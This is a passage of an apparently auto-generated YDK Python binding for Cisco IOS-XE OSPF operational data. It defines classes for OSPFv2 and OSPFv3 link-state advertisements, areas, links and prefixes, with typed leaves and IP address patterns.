Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value) class Ospfv2Instance(Entity): """ The OSPF instance .. attribute:: instance_id (key) The routing instance identifier assigned to the OSPF instance **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: vrf_name The name of the Virtual Routing and Forwarding instance that the OSPF instance is operating within **type**\: str **config**\: False .. attribute:: router_id The router identifer assigned to the OSPF instance **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_area The OSPF area information **type**\: list of :py:class:`Ospfv2Area <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area>` **config**\: False .. attribute:: ospfv2_lsdb_external The external LSDB information **type**\: list of :py:class:`Ospfv2LsdbExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance, self).__init__() self.yang_name = "ospfv2-instance" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['instance_id'] self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))]) self._leafs = OrderedDict([ ('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])), ('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ]) self.instance_id = None self.vrf_name = None self.router_id = None self.ospfv2_area = YList(self) self.ospfv2_lsdb_external = YList(self) self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value) class Ospfv2Area(Entity): """ The OSPF area information .. attribute:: area_id (key) The area identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsdb_area The OSPF Link State Database information for this area **type**\: list of :py:class:`Ospfv2LsdbArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea>` **config**\: False .. attribute:: ospfv2_interface A list of interfaces that belong to the area **type**\: list of :py:class:`Ospfv2Interface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__() self.yang_name = "ospfv2-area" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospfv2_lsdb_area = YList(self) self.ospfv2_interface = YList(self) self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value) class Ospfv2LsdbArea(Entity): """ The OSPF Link State Database information for this area .. attribute:: lsa_type (key) Link State Advertisement type **type**\: int **range:** 0..255 **config**\: False .. attribute:: lsa_id (key) Link State Advertisement Identifer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: advertising_router (key) Advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_age The age of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_options The options of the Link State Advertisement **type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>` **config**\: False .. attribute:: lsa_seq_number The sequence number for the Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_checksum The checksum of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_length The length, in bytes, of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: ospfv2_router_lsa_links The router Link State Advertisement links **type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks>` **config**\: False .. attribute:: unsupported_lsa The unsupported Link State Advertisements **type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa>` **config**\: False .. attribute:: router_lsa The router Link State Advertisements **type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa>` **config**\: False .. attribute:: network_lsa The network Link State Advertisements **type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa>` **config**\: False .. attribute:: network_summary_lsa The network summary Link State Advertisements **type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa>` **config**\: False .. attribute:: router_summary_lsa The router summary Link State Advertisements **type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa>` **config**\: False .. attribute:: external_lsa The external Link State Advertisements **type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa>` **config**\: False .. attribute:: nssa_lsa The Not So Stubby Area Link state advertisements **type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__() self.yang_name = "ospfv2-lsdb-area" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): """ The router Link State Advertisement links .. attribute:: link_type (key) Link Type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id (key) link Identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_topo Link topology **type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): """ Link topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): """ The unsupported Link State Advertisements .. attribute:: lsa_data Link State Advertisement data **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): """ The router Link State Advertisements .. attribute:: router_lsa_bits Router Link State Advertisement bits **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>` **config**\: False .. attribute:: router_lsa_number_links Router Link State Advertisement number of links **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): """ The network Link State Advertisements .. attribute:: network_lsa_mask Network Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: network_attached_routers Network attached routers **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = 